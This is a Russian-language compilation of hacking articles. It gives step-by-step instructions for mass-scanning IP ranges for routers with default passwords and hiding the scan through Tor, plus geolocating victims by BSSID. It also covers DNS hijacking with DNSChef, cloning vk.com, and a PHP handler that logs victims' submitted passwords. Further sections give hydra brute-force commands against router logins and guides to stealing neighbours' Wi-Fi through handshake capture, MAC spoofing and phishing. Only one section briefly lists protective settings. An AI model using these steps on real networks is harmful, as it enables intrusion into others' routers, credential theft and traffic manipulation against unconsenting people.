Как взломать роутер с помощью роутера

Массовый взлом роутеров с помощью Router Scan

@Leakinfo

В этой статье мы разберем возможные варианты использования роутеров. В целом это ваша фантазия. В зависимости от роутера можно выполнять разнообразные задачи.

Router Scan

Router Scan – программа для поиска и определения известных роутеров/маршрутизаторов и получения важной для нас информации: способ защиты точки доступа (шифрование), SSID и парольную фразу. Дополнительно отображается марка и модель роутера.

В работе программа использует два основных принципа:

1. Программа пытается подобрать данные для входа и словаря или заданных.

2. Программа будет использовать уязвимости для конкретной модели маршрутизатора чтобы получит нужную нам информацию или вовсе обойти ее.

Программа работает на базе операционной системы Windows. Можно адаптировать под Kali Linux c помощью Wine.

Как начать работу?

Router Scan

В статье я покажу, как работать с программой на базе ОС Windows. В сети достаточно информации, как адаптировать под Wine. После скачивания необходимо запустить программу и выбрать основные параметры. Начнем с портов, для роутеров/маршрутизаторов (80,1080,8080). Это именно те места, которые мы будем проверять на доступность. Выбираем стандартные данные для входа admin/admin. Самое интересное – это выбор диапазона сети.

С помощью этого параметра можно выбрать сеть своего города, района и т.д. Возможно, это будет полезно в некоторых случаях, и вы получите доступ к роутеру своей соседки). Немного ниже я опишу, как определить координаты по BSSID. Но для начала разберемся, как выбрать необходимый диапазон для сканирования.

Заметаем следы при сканировании

Router Scan позволяет проводить сканирование через HTTP(S) прокси. Можно использовать Tor. Дополнительно нужно установить Privoxy.

Не стоит забывать, что прокси сервер используется для передачи запросов и ответов HTTP/S. Попытки соединится с портом и секретные передачи данных идут в обход сервера. При желании можно узнать наш IP адрес.

Перейдите в раздел загрузок на сайте проекта Tor, выберите для загрузки Expert Bundle. Не браузер Tor, а именно Expert Bundle. Выгрузите в отдельную папку и запустите ярлык Tor.exe через командую строку. После завершения будет такая картинка(после завершения не нужно закрывать окно):

Установка Tor

Теперь скачаем и запустим Privoxy. Перейдите сюда, выберите последнюю версию. Имеются файлы .zip и файлы .exe. Исполнимый файл – это установщик. Я предпочитаю портативные версии, поэтому скачал zip архив. Распакуйте в любое место.

Откройте файл config.txt и в самый конец добавьте строки:

forward-socks4 / localhost:9050 .

forward-socks4a / localhost:9050 .

forward-socks5t / localhost:9050 .

Запустите файл privoxy.exe, откроется такое белое окно:

Privoxy

Перейдите в Option и поставьте галочку Enable.

Теперь перейдите к настройкам Router Scan: < Main Menu >, далее Settings and Tweaks, далее HTTP Client. Поставьте галочку Use Proxy Server, там где Proxy IP впишите 127.0.0.1, а где Proxy Port – 8118.

Настройки Router Scan

Основной смысл таких действий — пропускать веб-трафик через прокси. Сканирование будет происходит напрямую, что не дает 100% анонимности. Для этих целей лучше арендовать VDS под управление Windows.

Как выбрать нужный диапазон?

Есть довольно много способов, но в этой статье не будем зацикливаться на них. Для выбора конкретного диапазона воспользуемся онлайн сервисом suLP.biz:

· Выборка по городам, областям и республикам;

· Выборка по странам;

· Выборка по провайдерам.

Для сканирования можно указать как один IP адрес или диапазон через дефис. Ввести диапазон нужно в «Enter IP ranges to scan». Можно не обрезать внимание на стандартный вид диапазонов и указывать через дефис.

Выбор диапазона для сканирования

После указания диапазона можно еще настроить автоматическое сохранение успешных попыток в файл. Для этого необходимо открыть настройки и выбрать один из возможных форматов, как на скриншоте:

Сохранение в файл

Всю остальную информацию можно найти в справке или в сети. После этого можно начинать сканирование и следить за вкладкой успешных результатов.

После нескольких минут сканирования можно получить успешные результаты. Валидные данные можно посмотреть во вкладке «Good Results». Пример работы за несколько минут:

Good Results

Как определить местоположение по BSSID?

После того, как мы получили BSSID и доступ к роутеру можно проверить его местоположение. Для этого необходимо перейти по ссылке:

http://mobile.maps.yandex.net/cellid_location/?clid=1866854&lac=-1&cellid=-1&operatorid=null&countrycode=null&signalstrength=-1&wifinetworks=:-65&app=ymetro

И указать значение BSSID после wifinetworks= без двоеточий. Можно посмотреть на примере реального запроса:

http://mobile.maps.yandex.net/cellid_location/?clid=1866854&lac=-1&cellid=-1&operatorid=null&countrycode=null&signalstrength=-1&wifinetworks=048D3871A061:-65&app=ymetro

И получаем координаты, которые можно проверить в гугл картах. Погрешность точности не более 100м. Таким образом, можно теоретически узнать, где находиться роутер.

Координаты роутера

Создаем VPN-сервер на роутере

Можно использовать разнообразные идеи в качестве реализации. Можно использовать роутеры под управлением dd-wrt для поднятия VPN сервиса через протокол PPTP.

Для этого необходимо зайти в админку. Во вкладку Services и включить в настройках сервер PPTP.

Пример интерфейса админки

Основные формы, которые нужно заполнить:

PPTP — включено

IP: 192.168.1.155

CHAP-secrets: желаемое имя пользователя и желаемый пароль через пробелы со звёздочками

valkiria * 123456 *

После этого можно применять и подключать к серверу и использовать его в качестве VPN.

А можно сделать действительно многое, но вся зависит от ваших знаний и умений. В статье будут основы и азы, все остальное можно найти или придумать самому.

Заранее предупреждаю, что вмешиваюсь в работу чужой сети вы можете понести ответственность. Все материалы предоставляются исключительно в ознакомительных целях. Помните и думайте, перед там, как что-то делать.

Установка и запуск DNSChef

После получения доступа к роутеру есть смысл подумать о подмене DNS. Для этого можно воспользоваться разнообразными инструментами. Оптимальные вариант DNSChef, которые можно запустить, как на отдельном VDS, так и на Kali Linux. В последнем варианте утилита установлена по умолчанию.

Команды для установки DNSChef для Убунту:

sudo apt-get install python-ipy

sudo pip install dnslib

git clone https://github.com/iphelix/dnschef.git

unzip dnschef*

cd dnschef*

Проверить работоспособность можно с помощью команды:

python dnschef.py

dnschef

После установки и запуска можно переходить к функционалу. С помощью команды мы можем, например, подменивать сайты или слушать трафик. Это полезно для дальнейшей атаки, так как можно понять, какие сайты посещает пользователь и основываясь на этом – можно сделать фейк.

Для запуска подмены сайта необходимо запустить такую команду:

python dnschef.py -i IP_DNS_Прокси —fakeip IP_сервера —fakedomains vk.com

Для монитора трафика можно использовать этот способ. Если поставить команду nohup, а после команды символ &; это приведёт к тому, что после закрытия терминала процесс продолжит свою работу в фоне:

sudo nohup dnschef -i IP_вашего_DNS_прокси —logfile=/root/dns.log &

Просмотр сайтов пользователя

Смотреть данные с файла удобно в таком формате:

cat /root/dns.log

Запретить доступ к интернету можно с помощью команды:

sudo nohup dnschef -i IP_вашего_DNS_прокси —fakeip 127.0.0.1 —logfile=/root/dns.log &

Указываем DNS в роутере

После этого нужно добавить DNS сервер в роутер. Как добавить DNS сервер в роутер можно посмотреть в сети. Как правило, можно зайти и добавит IP на интуитивном уровне.

Изменения в роутере

Что можно сделать?

Можно, например, собрать базу всех часто посещаемых сайтов у сотрудников или коллег и заменит их на что-то полезное: мотивацию к действию, картинку или какой-то вирус. Все на ваше желание и усмотрение. Я хочу только показать, что, если знать, какие сайты посещает жертва, и добавить немного социальной инженерии можно с высокой вероятность перехватить пароли и загрузить фейковое обновление.

Можно воспользоваться любым сервисом для локальных компьютеров или воспользоваться бесплатной утилитой Vesta CP. После создания и запуска виртуального хоста и соответствующей команды для замены в DNSChef:

python dnschef.py -i IP_DNS_Прокси —fakeip IP_сервера —fakedomains vk.com

Как получить пароли с сайта?

Немного сложнее, но просто. Для создания хорошего фейка нужно воспользоваться утилитой HTTrack. Более детально описывать не буду, так и так понятно, что можно сделать. Еще раз обращаю внимание на то, что нужно проводить «развекду». Так вы будете знать точно, какие сайты посещает целевой пользователь.

На примере сайта vk.com необходимо выполнить такую команду:

httrack https://vk.com —headers «Accept-Language: ru-RU,ru;q=0.5» -r2 -F «Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36» -O «/home/admin/web/vk.com/public_html»

После завершения у вас будет полная копия сайта в папке vk.com. Далее нам необходимо заниматься обработкой событий после регистрации. Такими нехитрыми действиями пароли отправляться нам в файл. Это можно сделать с помощью такого варианта.

Нужно создать обработчик в корне каталога сайта с таким кодом c названием good.php:

$file = ‘login.txt’;

file_put_contents($file, print_r($_POST, true), FILE_APPEND);

После этого необходимо найти в коде главной страницы такую строки и добавить свой обработчик. Вместо ссылки указываем good.php.

Изменение обработчика событий

После этого сохраняем и перезагружаем. После ввода данных они будут отображаться в нашем файле login.txt. Для удобного мониторинга можно воспользоваться командой. Данные будут отображаться в формате массива данных:

cat hack.txt

Я думаю, что таким нехитрым и не сложным способом можно сделать фейк практически любого сайта. Если дополнительно использовать навыки социальной инженерии, то можно достичь высокой вероятности ввода данных.

Данный метод не подходит для HSTS. Для работы с такими соединениями можно воспользоваться утилитами SSLStrip и dns2proxy.

Что можно придумать еще?

На самом деле вариантов может быть куча: обновления, плагины, приложения и т.д.. Когда у нас есть доступ и весь трафик контролируется, то можно добавлять что угодно. Можно использовать еще фейковые обновление или установка дополнительных плагинов, таких как BeEF. Рассмотрим, как можно еще отображать рекламу.

Для работы с рекламой используются разные CDN (Content Delivery Network или Content Distribution Network). CDN способствует увеличению скорости загрузки интернет-пользователями аудио-, видео-, программного, игрового и других видов цифрового содержимого в точках присутствия сети CDN. Такую сетевую инфраструктуру можно реализовать в разных вариантах. Рассмотрим, как заражать сайты всплывающей рекламой, если сайт использует CDN jQuery.

Для этого нужно поднять сайт на локальном сервере code.jquery.com. После этого нужно изменить в коде js файле то, что нам нужно. Выгрузить можно по ссылке http://code.jquery.com/jquery-1.9.1.js.

Для добавления простой рекламы достаточно добавить такую конструкцию в конце файла:

$(function() {

$( «body» ).dialog({

height: 500,

width: 550,

modal: true,

autoOpen: false

});

setTimeout(function () {

$(«body»).dialog(«open»);

}, 5000)

});

После добавления этого кода в файл, на сайте будет добавляться всплывающая реклама через 5 секунд. В интернете можно найти разнообразные мануалы, как создавать такие страницы. Вот пример с исходным кодом.

Пример всплывающего окна

Чтобы закрыть максимальное количество вариантов, которые используют другие сайты в качестве CDN нужно воспользоваться командой:

python dnschef.py -i IP_DNS_Прокси —fakeip IP_сервера —fakedomains vk.com= code.jquery.com, jquery.com,www.code.jquery.com

  • 👮🏼 Отказ от ответственности

  • 📕 Главное меню
  • 🦋 Слитая информация — @Leakinfo
  • 🎭 Связь с нами — Точка входа
  • ❤️ Donate — BTC

Взлом «админки» роутера

Время на прочтение
4 мин

Количество просмотров 274K

*Здесь могло быть предупреждение о том, что не нужно пользоваться данной программой в преступных целях, но hydra это пишет перед каждым сеансом взлома*

image

В общем, решил я по своим нуждам покопаться в настройках роутера, вбиваю я всем знакомый адрес, а тут пароль спрашивают. Как быть? Ну, начал я перебирать пароли, а их количество слишком большое, что бы перебирать все и слишком маленькое, чтобы делать reset.

И я открыл google. После пары запросов я узнал о такой вещи как hydra. И тут началось: жажда открытий, поиски неизведанного и так далее.

Приступим

Первым делом мной был составлен словарь паролей, ни много, ни мало, аж на 25 комбинаций. Далее качаем либо Kali linux, либо саму Гидру (если

вы пингвин

у вас линукс). Теперь у нас два варианта (ну как два, я нашел информацию по двум вариантам).

Либо у вас вот такое диалоговое окно:

image

Либо логин и пароль запрашивает форма на сайте. Мой вариант первый, поэтому начнем с него. На нашем пути к «админке» стоит страж в виде диалогового окна. Это вид авторизации http-get.

Открываем терминал. Вводим:

hydra -l admin -P myPass.txt -s 80 192.168.1.1 http-get /

Где после «-l» идет логин, после «-P» словарь, после «-s» порт. Также в нашем распоряжении есть другие флаги:

-R восстановить предыдущую прерванную/оборванную сессию

-S выполнить SSL соединение

-s ПОРТ если служба не на порту по умолчанию, то можно задать порт здесь

-l ЛОГИН или -L ФАЙЛ с ЛОГИНАМИ (именами), или загрузить несколько логинов из ФАЙЛА

-p ПАРОЛЬ или -P ФАЙЛ с паролями для перебора, или загрузить несколько паролей из ФАЙЛА

-x МИНИМУМ: МАКСИМУМ: НАБОР_СИМВОЛОВ генерация паролей для брутфорса, наберите «-x -h» для помощи

-e nsr «n» — пробовать с пустым паролем, «s» — логин в качестве пароля и/или «r» — реверс учётных данных

-u зацикливаться на пользователя, а не на парлях (эффективно! подразумевается с использованием опции -x)

-C ФАЙЛ формат где «логин: пароль» разделены двоеточиями, вместо опции -L/-P

-M ФАЙЛ список серверов для атак, одна запись на строку, после двоеточия ‘:’ можно задать порт

-o ФАЙЛ записывать найденные пары логин/пароль в ФАЙЛ вместо стандартного вывода

-f / -F выйти, когда пара логин/пароль подобрана (-M: -f для хоста, -F глобально)

-t ЗАДАЧИ количество запущенных параллельно ЗАДАЧ (на хост, по умолчанию: 16)

-w / -W ВРЕМЯ время ожидания ответов (32 секунды) / между соединениями на поток
-4 / -6 предпочитать IPv4 (по умолчанию) или IPv6 адреса

-v / -V / -d вербальный режим / показывать логин+пароль для каждой попытки / режим отладки

-q не печатать сообщения об ошибках соединения

-U подробные сведения об использовании модуля
server цель: DNS, IP или 192.168.0.0/24 (эта ИЛИ опция -M)
service служба для взлома (смотрите список поддерживаемых протоколов)
OPT некоторые модули служб поддерживают дополнительный ввод (-U для справки по модулю)

Ну вот так как-то:

image

Второй вариант:

Не мой, честно взят с Античата, с исправлением грамматических ошибок автора (Обилие знаков пунктуации я оставил). Интересно это можно считать переводом?

Нас встречает форма на сайте:

image

Такой метод авторизации — http-post-form, и тут нужно немного повозится, так как нам нужно понять, как браузер отправляет роутеру данные.

В данном случае и использовал браузер Chrome (его аналог Chromium в Kali Linux, ставится через apt-get install chromium).

Сейчас нужно сделать одну очень глупую вещь… указать неверный логин и пасс…
для чего увидим позже…

Нажимаем F12 что бы перейти в режим редактирования веб-страницы.

image

Переходим в Network → Включаем галочку Preserv log.

image

Вводим ложные логин и пароль…

image

Ну что за дела? Так не пойдет! Более того, после нескольких неудачных попыток входа, форма блокируется на 180 секунд.

Переходим во вкладочку HEADERS ищем строку:

 Request URL:http://192.168.0.1/index.cgi

Отрезаем все до ip-адреса — /index.cgi… Поздравляю мы нашли первую часть скрипта авторизации… Идем дальше… Переходим к вкладке FORM DATA и изменяем режим отображения на VIEV SOURCE.

image

image

update_login=login&update_password=password&check_auth=y&tokenget=1300&
update_login=login&update_password=password 

Бинго! Мы нашли вторую часть скрипта авторизации! Еще чуть-чуть! теперь нужно найти страницу с сообщением об ошибке… Нужно нажать на вкладку ELEMENTS.

image

И выбрать элемент HTML кода (CTRL+SHIFT+C) и выбрать окно с сообщением об ошибки… в данном случае — Authentication failed!

image

<span langkey="bad_auth" style="display: inline;">Authentication failed!</span>

Выбираем:

span langkey="bad_auth"

и немножко правим… bad_auth — все! Ключ практически у нас в кармане… Теперь мы можем полностью написать строку авторизации:

index.cgi:update_login=login&update_password=password:bad_auth 

Теперь нужно подставить вместо «login» — ^USER^ и вместо «password» ^PASS^ и тогда строка будет иметь вид:

index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth 

Вводим команду:

hydra -l admin -P router-pass.dic -t 1 -e nsr -vV -f -s 80 192.168.0.1 http-post-form "/index.cgi:update_login=^USER^&update_password=^PASS^:bad_auth"

Обратите внимание что между частями скрипта двоеточие! это обязательно! Кстати, блокировки формы через гидру не происходило… Это очень радует.

image

В работоспособности второго метода мне убедиться не светит, так как я не обладатель подходящей модели роутера. Придется довериться экспрессивному человеку с Античата.

Если кому интересно, будьте добры, проверьте и отпишитесь в комментариях. Я работал с роутером TL-WR1043N/TL-WR1043ND. Роутер с Античата — D-link300NRU.

Спасибо за внимание!

Байки эникейщика #2. Ломаем соседский Wi-Fi с помощью Router ScanПривет. Что заинтересовался названием сюжета? Любопытно узнать, каким образом можно взломать WiFi своих бедных соседей и качать с торрентов, пользуясь халявным Интернетом? Этот сюжет как раз для тебя мой друг. Способ, который мы сегодня рассмотрим, поведал мне один из студентов. В своё время я потратил несколько месяцев на изучение способов взлома Wi-Fi. Тип шифрования WPA2 тогда не был распространён, а взлом первой версии, так или иначе, упирался в подбор паролей по словарю. Чем больше база различных словарей с нестандартными комбинациями паролей, тем выше вероятность удачной попытки взлома. Перебор занимал уйму времени, поэтому комп оставался включённым на ночь, для того, чтобы на следующий день, можно было поработать с результатами.

Со временем роутеры всё чаще стали использовать WPA2, а любители халявы стали выискивать другие способы. В то время эта тема меня уже не особо интересовала. Дома и на работе был доступ к шустрому (на тот момент) соединению ADSL и энтузиазм ломать чужие точки стремительно угасал. Все попытки накрыть вторую версию WPA, были тщетны. Нет, в теории то всё возможно. Но на практике, умельцев, которые действительно могли, что то противопоставить не на интернет-форумах, а в жизни мне видеть не доводилось.

И вот на прошлой неделе один весьма сообразительный студент заявляет, что умеет выуживать пароли от Wi-Fi без всяких словарей, многочасовых переборов и прочих танцев с бубном. Мол, просто кликаете пару раз, пьёте кофе и получаете соседские пароли на блюдечке. Естественно поначалу я весьма скептически отнёсся к подобному заявлению. Однако скачав программу Router Scan и проделав вместе с ним необходимые для взлома манипуляции по истечению 15 минут я своими глазами лицезрел пароль от беспроводной сети рабочего роутера.

Как же так, спросите вы. Неужто у вас Денис Сергеевич такой простой пароль на Wi-Fi, что его можно ломануть без особых усилий? Не совсем. Тут всё гораздо прозаичнее. Данная программа не подбирает пароли на вай фай. Принцип её работы заключается в атаке на роутеры через интернет. После указания диапазона внешних ip адресов Router Scan начинает попытки подбора стандартных сочетаний пары логин/пароль. Например, admin/admin или admin/12345. В результате чего получает доступ к маршрутизатору и соответственно может выуживать из него всю необходимую информацию: модель роутера, имя беспроводной точки доступа, пароль и т.д.

Взломщик wi-fi

Так уж сложилось, что пароль от самого роутера действительно мало кто меняет, а уж если и меняют пароль на обычный цифирный, то логин не трогают. Вот и получается, что на Wi-Fi пароль поставили такой, что сами вспомнить не можете, а роутер никак не обезопасили. Ведь действительно, для того, чтобы попасть на маршрутизатор, к нему нужно подключиться либо по беспроводному соединению, либо воткнув витую пару. Никому в голову и прийти не может, что на него могут ломиться извне, используя Интернет. Да и как можно ломиться? Для этого ведь нужно как минимум знать внешний ip адрес.

Вот мы собственно и подобрались к самой сути этого метода взлома соседского Wi-Fi. Вероятность того, что дядя Вася из соседней квартиры пользуется услугами того же провайдера, что и мы весьма велика. Следовательно, и ip адрес роутера Васи будет в рамках нашего общего диапазона, который нетрудно определить. Что ж давайте уже покажу на практике, как всё это работает. Ничего сложного в этом методе взлома нет, поэтому если вам уже наскучила моя теоретическая болтовня и жажда реальных действий одолевает всерьёз, то можете прямо сейчас вместе со мной проверить на прочность сети своих соседей.

Взлом Wi-Fi с помощью Router Scan

Шаг 1. Скачиваем последнюю версию программки Router Scan с торрентов, с сайта разработчика www.stascorp.com или по прямой ссылке. А затем разархивируем всё это дело в отдельную папку на рабочем столе.

Загрузка Router Scan

Шаг 2. Запускаем из папки исполняемый файл RouterScan.exe и принимаем условий соглашения, в котором торжественно клянёмся, использовать сей инструмент лишь в благих целях. В следующем окошке аналогично нажимаем на «Да» и дожидаемся загрузки графического интерфейса.

Запуск Router Scan

Шаг 3. Временно сворачиваем Router Scan, открываем браузер и заходим на сайт 2ip.ru и во вкладке тесты кликаем на пункт «Информация об IP адресе или домене».

Сайт www.2ip.ru

Шаг 4. В новом окне жмём на большую синюю кнопку «Проверить», а затем копируем из серой рамочки диапазон IP адресов нашего провайдера.

Диапазон IP адресов провайдера

Шаг 5. Возвращаемся к нашей программе и во вкладке «Enter IP ranges to scan» пользуясь кнопками навигации, удаляем написанные там диапазоны и вставляем скопированный с сайта 2ip. Жмём «ОК».

Диапазон IP для сканера

Шаг 6. Теперь дело за малым. Открываем вкладку «Good Results», жмём «Start scan» и идём заваривать кофе. Программе нужно немного времени, чтобы просканировать все IP адреса и выудить из роутеров нужную нам информацию.

Старт сканирования

Шаг 7. Дождавшись завершения процесса сканирования, открываем на панельке задач список с беспроводными сетевыми соединениями и смотрим, кто же у нас в нём есть. Выписываем все наименования сетей в отдельный файл или на листочек и возвратившись к Router Scan перемещаем ползунок с характеристиками готовых сеток немного правее. Нас интересуют лишь два параметра: «ESSID» и «Key». Первый это наименование Wi-Fi точки, а второй пароль от неё. Находим в списке необходимую сеть и пробуем подключиться.

Список беспроводных сетей

Отлично. Всё получилось. Теперь если я забуду заплатить за Интернет, добрый соседушка Tomas поделится им, не задавая лишних вопросов.

Подключение к Wi-Fi

Как защититься от Router Scan

Универсального способа защиты от напасти под названием Router Scan конечно не существует. Хотя нет, пожалуй, есть один. Нужно перестать пользоваться Интернетом, и никто не будет пытаться его украсть. Однако есть и более деликатное решение. Нужно лишь соблюдать следующие базовые рекомендации по настройке своего роутера:

  • Всегда меняйте связку «логин/пароль» для входа на устройство со стандартной «admin/admin» на, что то более безопасное. Особое внимание уделите созданию сложного пароля;
  • Регулярно обновляйте прошивку на вашем роутере с официального сайта производителя устройства;
  • Включайте функцию NAT. Эта функция есть на всех современных роутерах. Она преобразует частный IP адрес вашего компьютера в глобальный. Используется для того, чтобы несколько сетевых устройств (компьютер, смартфон, планшет) могли одновременно выходить в Интернет;
  • Активируйте в межсетевом экране DMZ и добавьте демилитаризованную зону с левым ip адресом (например, 192.168.10.254). При этом если злоумышленик попробует заломиться на вебморду роутера используя внешний IP, то непременно потерпит неудачу.

Друзья я дико извиняюсь, что не показал в данном сюжете более подробно все эти настройки безопасности. Это не потому, что мне лень. Просто существует множество моделей роутеров от разных производителей и если рассматривать даже один из них, то видео затянется на целый час. Так, что если вы задались темой безопасности своего роутера, пишите свои вопросы в комментарии под этим видео и мы решим вашу проблему сообща.

На этой ноте разрешите откланяться. С вами был Денис Курец. Сегодня вы прочли очередную байку эникейщика и научились одному из самых лёгких способов взлома Wi-Fi. Узнали, как эффективно обезопасить свой роутер от вездесущей программы Router Scan и теперь уж точно не станете жертвой бородатых соседей халявщиков. До встречи через недельку друзья, всем пока.

Делитесь с друзьями

Временами возникают ситуации, когда собственный Wi-Fi перестает работать. Или появляется необходимость подключиться на улице, со смартфоном в руках. Хочется узнать пароль от Wi-Fi соседа, закончить свои дела в сети, и больше никогда не возвращаться к чужому роутеру.

Добраться до сторонней точке доступа можно несколькими способами. Скорость «добычи» пароля зависит от хитрости владельца, мощности имеющихся устройств и количества свободного времени.

Метод подбора пароля

Самый простой, доступный и эффективный прием – перебрать очевидные комбинации. Люди плохо запоминают коды, прибегая к знакомым числовым вариациям: 12345678, 1111, 1234,4321 и так далее. К этому списку стоит прибавить «qwerty123», «ytrewq321» и «qazwsx123».

Смена mac-адреса

Вы замечали, что некоторые Wi-fi точки в городе лишены защиты? Подключиться к ней не удастся, потому что она фильтрует пользователей по mac-адресу.

Для непосвященных, mac-адрес – это идентификатор, своего рода ключ, который присваивается к девайсам, подключенным к сети Ethernet.

Чтобы добраться до ключа, приходится использовать специальные программы-сканнеры. Они анализируют Wi-Fi точки в округе и раскрывают их адреса.

Перехват трафика

Сложнейший способ добраться до чужого пароля. С помощью сторонних приложений перехватывается огромный объем данных, которыми роутер обменивается с устройством пользователя сети. Полученную информацию можно расшифровать, достать из нее пароль.

Осложнений масса. Нужно чтобы сетью пользовались по полной. Приходится бороться со сложным, запутанным интерфейсом. Если же вы хотите испытать свои силы, возможности – загружайте прогу «Commview forWiFi». Она подбирает раздаваемые пакеты и отображает их в виде узлов, каналов, типов сигнала, сетки из соединений и доступных точек беспроводного доступа. В профессиональных кругах ее чаще всего используют для поиска и устранения опасных вирусов, передающих зашифрованные данные в облако.

Взлом через pin точку доступа роутера

Этот способ открылся в 2011 году. Пользователь добирается до сети через взлом протокола WPS. Эта система включает шифрование и прописывает защитный ключ автоматически, без вмешательства пользователя. Упрощение для обывателей.

Опытные хакеры быстро нашли серьезную уязвимость технологии, которая позволяет открыть соседское подключение в считанные часы. Взлом происходит с помощью OCLinux и требует понимания основ программирования, беспроводной сетевой адаптер для перехвата данных и несколько часов свободного времени.

Если программное обеспечение роутера поддерживает такую функцию, то WPS можно и нужно отключать.

Фишинг

Фишинг поможет в том случае, если вы знаете адрес электронной почты соседей, а также понимаете, какой степенью компьютерной грамоты они владеют. Суть – отправить на их почтовый ящик письмо с требованием отправить в ответе пароль от Wi-Fi и другую полезную информацию.

Это метод мошенников добраться до номеров банковских карт, или нечестными способами отобрать виртуальные ценности.

Подробных инструкций, как пользоваться фишингом, не существует. Действуйте на свое усмотрение. Вариантов масса: напугать пойманным вирусом, шантажировать отключением интернета, или подойти мягко – предложить ускорить передачу данных, улучшить стабильность сети и в заранее созданной форме предложить ввести логин и пароль к роутеру.

Программы для взлома

Приложений для добычи чужих информданных сотни. Одни пользуются уязвимостью        встроенной защиты, другие действуют перебором паролей, третьи ищут mac-адрес, или существуют в качестве словарей, куда интернет-сообщество вводит актуальные пароли окружающих точек доступа.

Брутфорс

Брутфорс – с английского, «полный перебор», упомянутый выше метод получения данных, с помощью грубой силы. Если жертва не пользуется стандартными комбинациями, приходится устанавливать вспомогательный софт и разбираться в его интерфейсе.

Автоматический подбор комбинаций

Некоторые программы буквально вручную, в несколько потоков, посимвольно подбирают пароль к новой сети. Из-за чего работа с такими программами может длиться от нескольких дней до месяцев, в зависимости от длины искомого кода. Популярнейшие из них:

  • John the Ripper;
  • Aircrack-ng;
  • RainbowCrack.

Они позволяют указать длительность пароля, а также прибегнуть к нескольким механизмам подбора, что значительно уменьшает скорость поиска, а также снижает нагрузку на систему.

Wifi crack

Wifi crack – не ультимативное решение во взломе паролей, но удобная утилита для всех, кто не знаком с запутанным языком программирования. Работает на современных операционных системах, постоянно обновляется.

Прогой пользоваться очень просто:

  1. Скачать файлы. Зачастую это zip-архив, вмещающий драйверы и словарь самых популярных комбинаций. Также очень часто включает текстовую инструкцию со скриншотами;
  2. Разархивировать файл, запустить WiCrack.exe и скопировать в появившуюся командную строку команду, подписанную в мануале как «подбор пароля»;
  3. Запустить процесс. Варианты пароля останутся в отдельном файле с расширением .cap в корне папки с программой.
  4. Перейти на вкладку «Импорт» самой программы и вставить в него файл с расширением.
  5. Жмите «Старт». При удачном совпадении данных пароль появится в главном окне.

Изменение mac-адреса

Суть этого метода была описана выше. Нужно добраться до mac-адреса, чтобы интернет на устройстве заработал через чужой роутер. Нашли идентификатор? Теперь смените его на своем девайсе. На компьютере это делается так:

  1. Зайти в «Панель управления».узнать Wi-Fi соседа
  2. Перейти в раздел «Сеть и Интернет», выбрать «Центр управления сетями и общим доступом».
  3. Отыскать категорию: «Изменение параметров адаптера».
  4. Вызвать правой кнопкой мыши контекстное меню на желаемой точке доступа, выбрать «Свойства».
  5. Вкладка «Сеть», затем «Настроить», после «Дополнительно».
  6. Отметить «Network address» и ввести заветный 12-значный номер.
  7. Нажать «ОК» для перезапуска сетевого подключения.

На смартфонах поменять mac-адрес гораздо сложнее. На Android нужно получать root-права и воевать со сторонними приложениями. Делайте на свой страх и риск.

Mac address scanner

Mac address scanner раскрывает данные окружающих mac-адресов. Она не требует специальных знаний и не отличается сложным интерфейсом. При этом создатель утилиты не важен. Существует версия от ColarSoft. Ее нужно установить, запустить и нажать зеленую кнопку «Старт» для анализа окружающий сетей. Полученные данные сохраняются в памяти компьютера, или отправляются в интернет-хранилище.

Во втором столбце отображаются актуальные mac-адреса. Если владелец точки доступа не пользуется такой защитой, идентификатор будет отображаться как несколько иксов. В ином случае вы получите 12-значную комбинацию.

Программы для взлома

Суть платформ для хакинга описана выше, а вот список актуальных и сильных программ, используемых по всему миру.

  • AIRCRACK. Способна абсолютно на все, но представляет собой командную строку, куда нужно вводить команды. Дружелюбного интерфейса не завезли;
  • AIRSNORT. Перехватывает пакеты данных, подбирая ключи с помощью хитрых алгоритмов. Обновлялась несколько лет назад, но актуальности не потеряла;
  • KISMET. Больше защита от стороннего проникновения, но, при желании, позволяет пакеты протоколов сторонних роутеров, и даже находит скрытые сети;
  • FERN WI-FI WIRELESS CRACKER. Нацелена на безопасность системы. Перебирает пароли по словарю, а в случае WEP защиты роутера подключает алгоритмы для вывода реального пароля. Постоянно обновляется, обрастая дополнительными функциями;
  • AIRJACK. Функционально схожа с AIRCRACK, но еще умеет создавать ложную точку доступа, что помогает защитить основную от нежелательного взлома, или сделать так, чтобы жертва не подозревая подмены ввела пароль самостоятельно в несуществующий роутер;
  • WIFIPHISHER. Уникальный софт, фактически вирус, который подключается к чужой системе и выдает в браузере сообщение, требуя ввода пароля от WiFi якобы для установки важных обновлений. Пользователь слушается и больше не замечает каких-либо перемен. Злоумышленник получает желаемое.

Сommview для перехвата пакетов данных

Об этом инструментарии хочется рассказать немного подробнее. Приложение постоянно обновляется, обрастая ценными механиками и категориями. В основном используется сетевыми программистами и администраторами беспроводных сетей.

Программа разбивает пакеты данных на протоколы, показывает силу сигнала, его скорость и другие полезные параметры.

Чтобы позаимствовать ближайший интернет, нужно скачать приложение и просканировать желаемый WiFi из списка сетей. В программе отобразиться весь пакет передаваемых данных. Сommview позволяет воспользоваться функцией «реассоциация узлов». Пользователи отключатся от соединения автоматически, и моментально подключаться обратно, а программа раскроет протоколы EAPOL. В них скрывается необходимая информация – желаемые пароли для взлома Wi-Fiсети.

Декодировать полученные протоколы поможет AirCrack-NG.

Использование Aircrack ng

Это непростой инструментарий, требующий предварительной подготовки и множества дополнительных действий. Нажать «старт» и ждать положительного результата не стоит. Предварительно получив все возможные данные через Сommview нужно:

  1. Загрузить и запустить Aircrack ng, перейти на первую вкладку.
  2. В строку «Filenames» ввести путь к файлу с перехваченными пакетами.
  3. В категории «Encryption» указать «WPA».
  4. Есть есть словарь, или база популярных паролей, его нужно вставить в строку Worldlist.
  5. Отметить галочкой «Advanced option».
  6. В «Specify ESSID» написать имя искомой сети.
  7. В появившейся стройке ввести MAC-адрес сети, который можно достать с помощью Mac address Scanner.
  8. «Launch». Анализ имеющихся данных будет проводиться от 5 часов до нескольких дней.

Как взломать Wi-Fi c телефона

С телефона добраться до соседского пароля сложнее. На iPhone процесс требует невероятного уровня познаний из-за закрытости системы и искусственных ограничений. А на Android – получения root-прав, что само по себе угроза. После – установка соответствующего софта. Это те же словари, брутфорсеры, охотники на идентификаторы и так далее. Приложений очень много. Они требуют тех же действий, что и компьютерные версии. Иногда требующие большего запаса времени на обработку информации. Вот самые популярные утилиты. Проверенные, качественные, без вирусов.

Андроид приложения

  • WPS Connect;
  • WIFI WPS WPA TESTER;
  • WifiKill;
